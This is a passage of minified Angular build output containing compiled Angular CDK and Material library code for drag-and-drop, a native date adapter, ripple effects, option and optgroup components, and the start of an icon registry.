0:i._dragRef)||null);break}n=n.parentElement}})}_handleEvents(e){e.started.subscribe(i=>{this.started.emit({source:this,event:i.event}),this._changeDetectorRef.markForCheck()}),e.released.subscribe(i=>{this.released.emit({source:this,event:i.event})}),e.ended.subscribe(i=>{this.ended.emit({source:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:i.container.data,item:this,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:i.container.data,item:this})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,isPointerOverContainer:i.isPointerOverContainer,item:this,distance:i.distance,dropPoint:i.dropPoint,event:i.event})})}_assignDefaults(e){const{lockAxis:i,dragStartDelay:n,constrainPosition:r,previewClass:c,boundaryElement:d,draggingDisabled:T,rootElementSelector:k,previewContainer:q}=e;this.disabled=null!=T&&T,this.dragStartDelay=n||0,i&&(this.lockAxis=i),r&&(this.constrainPosition=r),c&&(this.previewClass=c),d&&(this.boundaryElement=d),k&&(this.rootElementSelector=k),q&&(this.previewContainer=q)}_setupHandlesListener(){this._handles.changes.pipe(Ro(this._handles),qr(e=>{const i=e.filter(n=>n._parentDrag===this).map(n=>n.element);this._selfHandle&&this.rootElementSelector&&i.push(this.element),this._dragRef.withHandles(i)}),Ur(e=>ra(...e.map(i=>i._stateChanges.pipe(Ro(i))))),ea(this._destroyed)).subscribe(e=>{const i=this._dragRef,n=e.element.nativeElement;e.disabled?i.disableHandle(n):i.enableHandle(n)})}}return t._dragInstances=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(fW,12),Ee(ga),Ee(qi),Ee(fo),Ee(hW,8),Ee(Cr,8),Ee(Hw),Ee(Ma),Ee(pW,10),Ee(mW,12))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDrag",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,vpe,5),ha(n,Mpe,5),ha(n,pW,5)),2&e){let r;Vt(r=Bt())&&(i._previewTemplate=r.first),Vt(r=Bt())&&(i._placeholderTemplate=r.first),Vt(r=Bt())&&(i._handles=r)}},hostAttrs:[1,"cdk-drag"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("cdk-drag-disabled",i.disabled)("cdk-drag-dragging",i._dragRef.isDragging())},inputs:{data:["cdkDragData","data"],lockAxis:["cdkDragLockAxis","lockAxis"],rootElementSelector:["cdkDragRootElement","rootElementSelector"],boundaryElement:["cdkDragBoundary","boundaryElement"],dragStartDelay:["cdkDragStartDelay","dragStartDelay"],freeDragPosition:["cdkDragFreeDragPosition","freeDragPosition"],disabled:["cdkDragDisabled","disabled"],constrainPosition:["cdkDragConstrainPosition","constrainPosition"],previewClass:["cdkDragPreviewClass","previewClass"],previewContainer:["cdkDragPreviewContainer","previewContainer"]},outputs:{started:"cdkDragStarted",released:"cdkDragReleased",ended:"cdkDragEnded",entered:"cdkDragEntered",exited:"cdkDragExited",dropped:"cdkDragDropped",moved:"cdkDragMoved"},exportAs:["cdkDrag"],features:[ki([{provide:mW,useExisting:t}]),sa]}),t})(),_W=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Hw],imports:[uu]}),t})();const Tpe=["*",[["mat-option"],["ng-container"]]],Epe=["*","mat-option, ng-container"];function Dpe(t,a){if(1&t&&it(0,"mat-pseudo-checkbox",4),2&t){const e=B();V("state",e.selected?"checked":"unchecked")("disabled",e.disabled)}}function xpe(t,a){if(1&t&&(m(0,"span",5),s(1),u()),2&t){const e=B();C(1),ct("(",e.group.label,")")}}const wpe=["*"];let Ipe=(()=>{class t{}return t.STANDARD_CURVE="cubic-bezier(0.4,0.0,0.2,1)",t.DECELERATION_CURVE="cubic-bezier(0.0,0.0,0.2,1)",t.ACCELERATION_CURVE="cubic-bezier(0.4,0.0,1,1)",t.SHARP_CURVE="cubic-bezier(0.4,0.0,0.6,1)",t})(),Rpe=(()=>{class t{}return t.COMPLEX="375ms",t.ENTERING="225ms",t.EXITING="195ms",t})();const kpe=new ni("mat-sanity-checks",{providedIn:"root",factory:function Spe(){return!0}});let la=(()=>{class t{constructor(e,i,n){this._sanityChecks=i,this._document=n,this._hasDoneGlobalChecks=!1,e._applyBodyHighContrastModeCssClasses(),this._hasDoneGlobalChecks||(this._hasDoneGlobalChecks=!0)}_checkIsEnabled(e){return!rw()&&("boolean"==typeof this._sanityChecks?this._sanityChecks:!!this._sanityChecks[e])}}return t.\u0275fac=function(e){return new(e||t)(At(Qz),At(kpe,8),At(ga))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,R1]}),t})();function Jc(t){return class extends t{constructor(...a){super(...a),this._disabled=!1}get disabled(){return this._disabled}set disabled(a){this._disabled=wi(a)}}}function kd(t,a){return class extends t{constructor(...e){super(...e),this.defaultColor=a,this.color=a}get color(){return this._color}set color(e){const i=e||this.defaultColor;i!==this._color&&(this._color&&this._elementRef.nativeElement.classList.remove(`mat-${this._color}`),i&&this._elementRef.nativeElement.classList.add(`mat-${i}`),this._color=i)}}}function Dl(t){return class extends t{constructor(...a){super(...a),this._disableRipple=!1}get disableRipple(){return this._disableRipple}set disableRipple(a){this._disableRipple=wi(a)}}}function mp(t,a=0){return class extends t{constructor(...e){super(...e),this._tabIndex=a,this.defaultTabIndex=a}get tabIndex(){return this.disabled?-1:this._tabIndex}set tabIndex(e){this._tabIndex=null!=e?Uo(e):this.defaultTabIndex}}}function Uw(t){return class extends t{constructor(...a){super(...a),this.errorState=!1}updateErrorState(){const a=this.errorState,r=(this.errorStateMatcher||this._defaultErrorStateMatcher).isErrorState(this.ngControl?this.ngControl.control:null,this._parentFormGroup||this._parentForm);r!==a&&(this.errorState=r,this.stateChanges.next())}}}function yW(t){return class extends t{constructor(...a){super(...a),this._isInitialized=!1,this._pendingSubscribers=[],this.initialized=new G(e=>{this._isInitialized?this._notifySubscriber(e):this._pendingSubscribers.push(e)})}_markInitialized(){this._isInitialized=!0,this._pendingSubscribers.forEach(this._notifySubscriber),this._pendingSubscribers=null}_notifySubscriber(a){a.next(),a.complete()}}}const Ppe=new ni("MAT_DATE_LOCALE",{providedIn:"root",factory:function Ope(){return Po(dm)}});class pu{constructor(){this._localeChanges=new J,this.localeChanges=this._localeChanges}getValidDateOrNull(a){return this.isDateInstance(a)&&this.isValid(a)?a:null}deserialize(a){return null==a||this.isDateInstance(a)&&this.isValid(a)?a:this.invalid()}setLocale(a){this.locale=a,this._localeChanges.next()}compareDate(a,e){return this.getYear(a)-this.getYear(e)||this.getMonth(a)-this.getMonth(e)||this.getDate(a)-this.getDate(e)}sameDate(a,e){if(a&&e){let i=this.isValid(a),n=this.isValid(e);return i&&n?!this.compareDate(a,e):i==n}return a==e}clampDate(a,e,i){return e&&this.compareDate(a,e)<0?e:i&&this.compareDate(a,i)>0?i:a}}const qw=new ni("mat-date-formats"),Npe=/^\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|(?:(?:\+|-)\d{2}:\d{2}))?)?$/;function Gw(t,a){const e=Array(t);for(let i=0;i<t;i++)e[i]=a(i);return e}let Lpe=(()=>{class t extends pu{constructor(e,i){super(),this.useUtcForDisplay=!1,super.setLocale(e)}getYear(e){return e.getFullYear()}getMonth(e){return e.getMonth()}getDate(e){return e.getDate()}getDayOfWeek(e){return e.getDay()}getMonthNames(e){const i=new Intl.DateTimeFormat(this.locale,{month:e,timeZone:"utc"});return Gw(12,n=>this._format(i,new Date(2017,n,1)))}getDateNames(){const e=new Intl.DateTimeFormat(this.locale,{day:"numeric",timeZone:"utc"});return Gw(31,i=>this._format(e,new Date(2017,0,i+1)))}getDayOfWeekNames(e){const i=new Intl.DateTimeFormat(this.locale,{weekday:e,timeZone:"utc"});return Gw(7,n=>this._format(i,new Date(2017,0,n+1)))}getYearName(e){const i=new Intl.DateTimeFormat(this.locale,{year:"numeric",timeZone:"utc"});return this._format(i,e)}getFirstDayOfWeek(){return 0}getNumDaysInMonth(e){return this.getDate(this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+1,0))}clone(e){return new Date(e.getTime())}createDate(e,i,n){let r=this._createDateWithOverflow(e,i,n);return r.getMonth(),r}today(){return new Date}parse(e,i){return"number"==typeof e?new Date(e):e?new Date(Date.parse(e)):null}format(e,i){if(!this.isValid(e))throw Error("NativeDateAdapter: Cannot format invalid date.");const n=new Intl.DateTimeFormat(this.locale,Object.assign(Object.assign({},i),{timeZone:"utc"}));return this._format(n,e)}addCalendarYears(e,i){return this.addCalendarMonths(e,12*i)}addCalendarMonths(e,i){let n=this._createDateWithOverflow(this.getYear(e),this.getMonth(e)+i,this.getDate(e));return this.getMonth(n)!=((this.getMonth(e)+i)%12+12)%12&&(n=this._createDateWithOverflow(this.getYear(n),this.getMonth(n),0)),n}addCalendarDays(e,i){return this._createDateWithOverflow(this.getYear(e),this.getMonth(e),this.getDate(e)+i)}toIso8601(e){return[e.getUTCFullYear(),this._2digit(e.getUTCMonth()+1),this._2digit(e.getUTCDate())].join("-")}deserialize(e){if("string"==typeof e){if(!e)return null;if(Npe.test(e)){let i=new Date(e);if(this.isValid(i))return i}}return super.deserialize(e)}isDateInstance(e){return e instanceof Date}isValid(e){return!isNaN(e.getTime())}invalid(){return new Date(NaN)}_createDateWithOverflow(e,i,n){const r=new Date;return r.setFullYear(e,i,n),r.setHours(0,0,0,0),r}_2digit(e){return("00"+e).slice(-2)}_format(e,i){const n=new Date;return n.setUTCFullYear(i.getFullYear(),i.getMonth(),i.getDate()),n.setUTCHours(i.getHours(),i.getMinutes(),i.getSeconds(),i.getMilliseconds()),e.format(n)}}return t.\u0275fac=function(e){return new(e||t)(At(Ppe,8),At(sr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const zpe={parse:{dateInput:null},display:{dateInput:{year:"numeric",month:"numeric",day:"numeric"},monthYearLabel:{year:"numeric",month:"short"},dateA11yLabel:{year:"numeric",month:"long",day:"numeric"},monthYearA11yLabel:{year:"numeric",month:"long"}}};let Wpe=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:pu,useClass:Lpe}]}),t})(),bW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[{provide:qw,useValue:zpe}],imports:[Wpe]}),t})(),up=(()=>{class t{isErrorState(e,i){return!!(e&&e.invalid&&(e.touched||i&&i.submitted))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Or=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-line",""],["","matLine",""]],hostAttrs:[1,"mat-line"]}),t})();function eb(t,a,e){t.nativeElement.classList.toggle(a,e)}let vW=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})();class Fpe{constructor(a,e,i,n=!1){this._renderer=a,this.element=e,this.config=i,this._animationForciblyDisabledThroughCss=n,this.state=3}fadeOut(){this._renderer.fadeOutRipple(this)}}const AW={enterDuration:225,exitDuration:150},jw=ym({passive:!0}),TW=["mousedown","touchstart"],EW=["mouseup","mouseleave","touchend","touchcancel"];class DW{constructor(a,e,i,n){this._target=a,this._ngZone=e,this._isPointerDown=!1,this._activeRipples=new Map,this._pointerUpEventsRegistered=!1,n.isBrowser&&(this._containerElement=Gr(i))}fadeInRipple(a,e,i={}){const n=this._containerRect=this._containerRect||this._containerElement.getBoundingClientRect(),r=Object.assign(Object.assign({},AW),i.animation);i.centered&&(a=n.left+n.width/2,e=n.top+n.height/2);const c=i.radius||function Bpe(t,a,e){const i=Math.max(Math.abs(t-e.left),Math.abs(t-e.right)),n=Math.max(Math.abs(a-e.top),Math.abs(a-e.bottom));return Math.sqrt(i*i+n*n)}(a,e,n),d=a-n.left,T=e-n.top,k=r.enterDuration,q=document.createElement("div");q.classList.add("mat-ripple-element"),q.style.left=d-c+"px",q.style.top=T-c+"px",q.style.height=2*c+"px",q.style.width=2*c+"px",null!=i.color&&(q.style.backgroundColor=i.color),q.style.transitionDuration=`${k}ms`,this._containerElement.appendChild(q);const Y=window.getComputedStyle(q),pe=Y.transitionDuration,Re="none"===Y.transitionProperty||"0s"===pe||"0s, 0s"===pe,Fe=new Fpe(this,q,i,Re);q.style.transform="scale3d(1, 1, 1)",Fe.state=0,i.persistent||(this._mostRecentTransientRipple=Fe);let Ne=null;return!Re&&(k||r.exitDuration)&&this._ngZone.runOutsideAngular(()=>{const et=()=>this._finishRippleTransition(Fe),ut=()=>this._destroyRipple(Fe);q.addEventListener("transitionend",et),q.addEventListener("transitioncancel",ut),Ne={onTransitionEnd:et,onTransitionCancel:ut}}),this._activeRipples.set(Fe,Ne),(Re||!k)&&this._finishRippleTransition(Fe),Fe}fadeOutRipple(a){if(2===a.state||3===a.state)return;const e=a.element,i=Object.assign(Object.assign({},AW),a.config.animation);e.style.transitionDuration=`${i.exitDuration}ms`,e.style.opacity="0",a.state=2,(a._animationForciblyDisabledThroughCss||!i.exitDuration)&&this._finishRippleTransition(a)}fadeOutAll(){this._getActiveRipples().forEach(a=>a.fadeOut())}fadeOutAllNonPersistent(){this._getActiveRipples().forEach(a=>{a.config.persistent||a.fadeOut()})}setupTriggerEvents(a){const e=Gr(a);!e||e===this._triggerElement||(this._removeTriggerEvents(),this._triggerElement=e,this._registerEvents(TW))}handleEvent(a){"mousedown"===a.type?this._onMousedown(a):"touchstart"===a.type?this._onTouchStart(a):this._onPointerUp(),this._pointerUpEventsRegistered||(this._registerEvents(EW),this._pointerUpEventsRegistered=!0)}_finishRippleTransition(a){0===a.state?this._startFadeOutTransition(a):2===a.state&&this._destroyRipple(a)}_startFadeOutTransition(a){const e=a===this._mostRecentTransientRipple,{persistent:i}=a.config;a.state=1,!i&&(!e||!this._isPointerDown)&&a.fadeOut()}_destroyRipple(a){var e;const i=null!==(e=this._activeRipples.get(a))&&void 0!==e?e:null;this._activeRipples.delete(a),this._activeRipples.size||(this._containerRect=null),a===this._mostRecentTransientRipple&&(this._mostRecentTransientRipple=null),a.state=3,null!==i&&(a.element.removeEventListener("transitionend",i.onTransitionEnd),a.element.removeEventListener("transitioncancel",i.onTransitionCancel)),a.element.remove()}_onMousedown(a){const e=W3(a),i=this._lastTouchStartEvent&&Date.now()<this._lastTouchStartEvent+800;!this._target.rippleDisabled&&!e&&!i&&(this._isPointerDown=!0,this.fadeInRipple(a.clientX,a.clientY,this._target.rippleConfig))}_onTouchStart(a){if(!this._target.rippleDisabled&&!F3(a)){this._lastTouchStartEvent=Date.now(),this._isPointerDown=!0;const e=a.changedTouches;for(let i=0;i<e.length;i++)this.fadeInRipple(e[i].clientX,e[i].clientY,this._target.rippleConfig)}}_onPointerUp(){!this._isPointerDown||(this._isPointerDown=!1,this._getActiveRipples().forEach(a=>{!a.config.persistent&&(1===a.state||a.config.terminateOnPointerUp&&0===a.state)&&a.fadeOut()}))}_registerEvents(a){this._ngZone.runOutsideAngular(()=>{a.forEach(e=>{this._triggerElement.addEventListener(e,this,jw)})})}_getActiveRipples(){return Array.from(this._activeRipples.keys())}_removeTriggerEvents(){this._triggerElement&&(TW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}),this._pointerUpEventsRegistered&&EW.forEach(a=>{this._triggerElement.removeEventListener(a,this,jw)}))}}const xW=new ni("mat-ripple-global-options");let xl=(()=>{class t{constructor(e,i,n,r,c){this._elementRef=e,this._animationMode=c,this.radius=0,this._disabled=!1,this._isInitialized=!1,this._globalOptions=r||{},this._rippleRenderer=new DW(this,i,e,n)}get disabled(){return this._disabled}set disabled(e){e&&this.fadeOutAllNonPersistent(),this._disabled=e,this._setupTriggerEventsIfEnabled()}get trigger(){return this._trigger||this._elementRef.nativeElement}set trigger(e){this._trigger=e,this._setupTriggerEventsIfEnabled()}ngOnInit(){this._isInitialized=!0,this._setupTriggerEventsIfEnabled()}ngOnDestroy(){this._rippleRenderer._removeTriggerEvents()}fadeOutAll(){this._rippleRenderer.fadeOutAll()}fadeOutAllNonPersistent(){this._rippleRenderer.fadeOutAllNonPersistent()}get rippleConfig(){return{centered:this.centered,radius:this.radius,color:this.color,animation:Object.assign(Object.assign(Object.assign({},this._globalOptions.animation),"NoopAnimations"===this._animationMode?{enterDuration:0,exitDuration:0}:{}),this.animation),terminateOnPointerUp:this._globalOptions.terminateOnPointerUp}}get rippleDisabled(){return this.disabled||!!this._globalOptions.disabled}_setupTriggerEventsIfEnabled(){!this.disabled&&this._isInitialized&&this._rippleRenderer.setupTriggerEvents(this.trigger)}launch(e,i=0,n){return"number"==typeof e?this._rippleRenderer.fadeInRipple(e,i,Object.assign(Object.assign({},this.rippleConfig),n)):this._rippleRenderer.fadeInRipple(0,0,Object.assign(Object.assign({},this.rippleConfig),e))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(sr),Ee(xW,8),Ee(ir,8))},t.\u0275dir=Ot({type:t,selectors:[["","mat-ripple",""],["","matRipple",""]],hostAttrs:[1,"mat-ripple"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-ripple-unbounded",i.unbounded)},inputs:{color:["matRippleColor","color"],unbounded:["matRippleUnbounded","unbounded"],centered:["matRippleCentered","centered"],radius:["matRippleRadius","radius"],animation:["matRippleAnimation","animation"],disabled:["matRippleDisabled","disabled"],trigger:["matRippleTrigger","trigger"]},exportAs:["matRipple"]}),t})(),Pd=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,la]}),t})(),wW=(()=>{class t{constructor(e){this._animationMode=e,this.state="unchecked",this.disabled=!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(ir,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-pseudo-checkbox"]],hostAttrs:[1,"mat-pseudo-checkbox"],hostVars:8,hostBindings:function(e,i){2&e&&Ct("mat-pseudo-checkbox-indeterminate","indeterminate"===i.state)("mat-pseudo-checkbox-checked","checked"===i.state)("mat-pseudo-checkbox-disabled",i.disabled)("_mat-animation-noopable","NoopAnimations"===i._animationMode)},inputs:{state:"state",disabled:"disabled"},decls:0,vars:0,template:function(e,i){},styles:['.mat-pseudo-checkbox{width:16px;height:16px;border:2px solid;border-radius:2px;cursor:pointer;display:inline-block;vertical-align:middle;box-sizing:border-box;position:relative;flex-shrink:0;transition:border-color 90ms cubic-bezier(0, 0, 0.2, 0.1),background-color 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox::after{position:absolute;opacity:0;content:"";border-bottom:2px solid currentColor;transition:opacity 90ms cubic-bezier(0, 0, 0.2, 0.1)}.mat-pseudo-checkbox.mat-pseudo-checkbox-checked,.mat-pseudo-checkbox.mat-pseudo-checkbox-indeterminate{border-color:rgba(0,0,0,0)}.mat-pseudo-checkbox._mat-animation-noopable{transition:none !important;animation:none !important}.mat-pseudo-checkbox._mat-animation-noopable::after{transition:none}.mat-pseudo-checkbox-disabled{cursor:default}.mat-pseudo-checkbox-indeterminate::after{top:5px;left:1px;width:10px;opacity:1;border-radius:2px}.mat-pseudo-checkbox-checked::after{top:2.4px;left:1px;width:8px;height:3px;border-left:2px solid currentColor;transform:rotate(-45deg);opacity:1;box-sizing:content-box}'],encapsulation:2,changeDetection:0}),t})(),Qw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la]}),t})();const G3=new ni("MAT_OPTION_PARENT_COMPONENT"),Hpe=Jc(class{});let Upe=0,qpe=(()=>{class t extends Hpe{constructor(e){var i;super(),this._labelId="mat-optgroup-label-"+Upe++,this._inert=null!==(i=null==e?void 0:e.inertGroups)&&void 0!==i&&i}}return t.\u0275fac=function(e){return new(e||t)(Ee(G3,8))},t.\u0275dir=Ot({type:t,inputs:{label:"label"},features:[ci]}),t})();const j3=new ni("MatOptgroup");let Cg=(()=>{class t extends qpe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-optgroup"]],hostAttrs:[1,"mat-optgroup"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("role",i._inert?null:"group")("aria-disabled",i._inert?null:i.disabled.toString())("aria-labelledby",i._inert?null:i._labelId),Ct("mat-optgroup-disabled",i.disabled))},inputs:{disabled:"disabled"},exportAs:["matOptgroup"],features:[ki([{provide:j3,useExisting:t}]),ci],ngContentSelectors:Epe,decls:4,vars:2,consts:[["aria-hidden","true",1,"mat-optgroup-label",3,"id"]],template:function(e,i){1&e&&(Jn(Tpe),m(0,"span",0),s(1),va(2),u(),va(3,1)),2&e&&(V("id",i._labelId),C(1),ct("",i.label," "))},styles:[".mat-optgroup-label{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup-label[disabled]{cursor:default}[dir=rtl] .mat-optgroup-label{text-align:right}.mat-optgroup-label .mat-icon{margin-right:16px;vertical-align:middle}.mat-optgroup-label .mat-icon svg{vertical-align:top}[dir=rtl] .mat-optgroup-label .mat-icon{margin-left:16px;margin-right:0}"],encapsulation:2,changeDetection:0}),t})(),Gpe=0;class IW{constructor(a,e=!1){this.source=a,this.isUserInput=e}}let jpe=(()=>{class t{constructor(e,i,n,r){this._element=e,this._changeDetectorRef=i,this._parent=n,this.group=r,this._selected=!1,this._active=!1,this._disabled=!1,this._mostRecentViewValue="",this.id="mat-option-"+Gpe++,this.onSelectionChange=new Tt,this._stateChanges=new J}get multiple(){return this._parent&&this._parent.multiple}get selected(){return this._selected}get disabled(){return this.group&&this.group.disabled||this._disabled}set disabled(e){this._disabled=wi(e)}get disableRipple(){return!(!this._parent||!this._parent.disableRipple)}get active(){return this._active}get viewValue(){return(this._getHostElement().textContent||"").trim()}select(){this._selected||(this._selected=!0,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}deselect(){this._selected&&(this._selected=!1,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent())}focus(e,i){const n=this._getHostElement();"function"==typeof n.focus&&n.focus(i)}setActiveStyles(){this._active||(this._active=!0,this._changeDetectorRef.markForCheck())}setInactiveStyles(){this._active&&(this._active=!1,this._changeDetectorRef.markForCheck())}getLabel(){return this.viewValue}_handleKeydown(e){(13===e.keyCode||32===e.keyCode)&&!Zr(e)&&(this._selectViaInteraction(),e.preventDefault())}_selectViaInteraction(){this.disabled||(this._selected=!this.multiple||!this._selected,this._changeDetectorRef.markForCheck(),this._emitSelectionChangeEvent(!0))}_getAriaSelected(){return this.selected||!this.multiple&&null}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._element.nativeElement}ngAfterViewChecked(){if(this._selected){const e=this.viewValue;e!==this._mostRecentViewValue&&(this._mostRecentViewValue=e,this._stateChanges.next())}}ngOnDestroy(){this._stateChanges.complete()}_emitSelectionChangeEvent(e=!1){this.onSelectionChange.emit(new IW(this,e))}}return t.\u0275fac=function(e){pd()},t.\u0275dir=Ot({type:t,inputs:{value:"value",id:"id",disabled:"disabled"},outputs:{onSelectionChange:"onSelectionChange"}}),t})(),yr=(()=>{class t extends jpe{constructor(e,i,n,r){super(e,i,n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Ma),Ee(G3,8),Ee(j3,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-option"]],hostAttrs:["role","option",1,"mat-option","mat-focus-indicator"],hostVars:12,hostBindings:function(e,i){1&e&&he("click",function(){return i._selectViaInteraction()})("keydown",function(r){return i._handleKeydown(r)}),2&e&&(Gs("id",i.id),Rt("tabindex",i._getTabIndex())("aria-selected",i._getAriaSelected())("aria-disabled",i.disabled.toString()),Ct("mat-selected",i.selected)("mat-option-multiple",i.multiple)("mat-active",i.active)("mat-option-disabled",i.disabled))},exportAs:["matOption"],features:[ci],ngContentSelectors:wpe,decls:5,vars:4,consts:[["class","mat-option-pseudo-checkbox",3,"state","disabled",4,"ngIf"],[1,"mat-option-text"],["class","cdk-visually-hidden",4,"ngIf"],["mat-ripple","",1,"mat-option-ripple",3,"matRippleTrigger","matRippleDisabled"],[1,"mat-option-pseudo-checkbox",3,"state","disabled"],[1,"cdk-visually-hidden"]],template:function(e,i){1&e&&(Jn(),ne(0,Dpe,1,2,"mat-pseudo-checkbox",0),m(1,"span",1),va(2),u(),ne(3,xpe,2,1,"span",2),it(4,"div",3)),2&e&&(V("ngIf",i.multiple),C(3),V("ngIf",i.group&&i.group._inert),C(1),V("matRippleTrigger",i._getHostElement())("matRippleDisabled",i.disabled||i.disableRipple))},dependencies:[xl,Ri,wW],styles:['.mat-option{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative;cursor:pointer;outline:none;display:flex;flex-direction:row;max-width:100%;box-sizing:border-box;align-items:center;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mat-option[disabled]{cursor:default}[dir=rtl] .mat-option{text-align:right}.mat-option .mat-icon{margin-right:16px;vertical-align:middle}.mat-option .mat-icon svg{vertical-align:top}[dir=rtl] .mat-option .mat-icon{margin-left:16px;margin-right:0}.mat-option[aria-disabled=true]{-webkit-user-select:none;user-select:none;cursor:default}.mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:32px}[dir=rtl] .mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:16px;padding-right:32px}.mat-option.mat-active::before{content:""}.cdk-high-contrast-active .mat-option[aria-disabled=true]{opacity:.5}.cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{content:"";position:absolute;top:50%;right:16px;transform:translateY(-50%);width:10px;height:0;border-bottom:solid 10px;border-radius:10px}[dir=rtl] .cdk-high-contrast-active .mat-option.mat-selected:not(.mat-option-multiple)::after{right:auto;left:16px}.mat-option-text{display:inline-block;flex-grow:1;overflow:hidden;text-overflow:ellipsis}.mat-option .mat-option-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-option-pseudo-checkbox{margin-right:8px}[dir=rtl] .mat-option-pseudo-checkbox{margin-left:8px;margin-right:0}'],encapsulation:2,changeDetection:0}),t})();function $w(t,a,e){if(e.length){let i=a.toArray(),n=e.toArray(),r=0;for(let c=0;c<t+1;c++)i[c].group&&i[c].group===n[r]&&r++;return r}return 0}function RW(t,a,e,i){return t<e?t:t+a>e+i?Math.max(0,t-i+a):e}let Q3=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Pd,rn,la,Qw]}),t})();const Qpe=["*"];let $3;function tb(t){var a;return(null===(a=function $pe(){if(void 0===$3&&($3=null,"undefined"!=typeof window)){const t=window;void 0!==t.trustedTypes&&($3=t.trustedTypes.createPolicy("angular#components",{createHTML:a=>a}))}return $3}())||void 0===a?void 0:a.createHTML(t))||t}function SW(t){return Error(`Unable to find icon with the name "${t}"`)}function kW(t){return Error(`The URL provided to MatIconRegistry was not trusted as a resource URL via Angular's DomSanitizer. Attempted URL was "${t}".`)}function PW(t){return Error(`The literal provided to MatIconRegistry was not trusted as safe HTML by Angular's DomSanitizer. Attempted literal was "${t}".`)}class yg{constructor(a,e,i){this.url=a,this.svgText=e,this.options=i}}let K3=(()=>{class t{constructor(e,i,n,r){this._httpClient=e,this._sanitizer=i,this._errorHandler=r,this._svgIconConfigs=new Map,this._iconSetConfigs=new Map,this._cachedIconsByUrl=new Map,this._inProgressUrlFetches=new Map,this._fontCssClassesByAlias=new Map,this._resolvers=[],this._defaultFontSetClass=["material-icons","mat-ligature-font"],this._document=n}addSvgIcon(e,i,n){return this.addSvgIconInNamespace("",e,i,n)}addSvgIconLiteral(e,i,n){return this.addSvgIconLiteralInNamespace("",e,i,n)}addSvgIconInNamespace(e,i,n,r){return this._addSvgIconConfig(e,i,new yg(n,null,r))}addSvgIconResolver(e){return this._resolvers.push(e),this}addSvgIconLiteralInNamespace(e,i,n,r){const c=this._sanitizer.sanitize(oo.HTML,n);if(!c)throw PW(n);const d=tb(c);return this._addSvgIconConfig(e,i,new yg("",d,r))}addSvgIconSet(e,i){return this.addSvgIconSetInNamespace("",e,i)}addSvgIconSetLiteral(e,i){return this.addSvgIconSetLiteralInNamespace("",e,i)}addSvgIconSetInNamespace(e,i,n){return this._addSvgIconSetConfig(e,new yg(i,null,n))}addSvgIconSetLiteralInNamespace(e,i,n){const r=this._sanitizer.sanitize(oo.HTML,i);if(!r)throw PW(i);const c=tb(r);return this._addSvgIconSetConfig(e,new yg("",c,n))}registerFontClassAlias(e,i=e){return this._fontCssClassesByAlias.set(e,i),this}classNameForFontAlias(e){return this._fontCssClassesByAlias.get(e)||e}setDefaultFontSetClass(...e){return this._defaultFontSetClass=e,this}getDefaultFontSetClass(){return this._defaultFontSetClass}getSvgIconFromUrl(e){const i=this._sanitizer.sanitize(oo.RESOURCE_URL,e);if(!i)throw kW(e);const n=this._cachedIconsByUrl.get(i);return n?Bi(X3(n)):this._loadSvgIconFromConfig(new yg(e,null)).pipe(qr(r=>this._cachedIconsByUrl.set(i,r)),Xe(r=>X3(r)))}getNamedSvgIcon(e,i=""){const n=OW(i,e);let 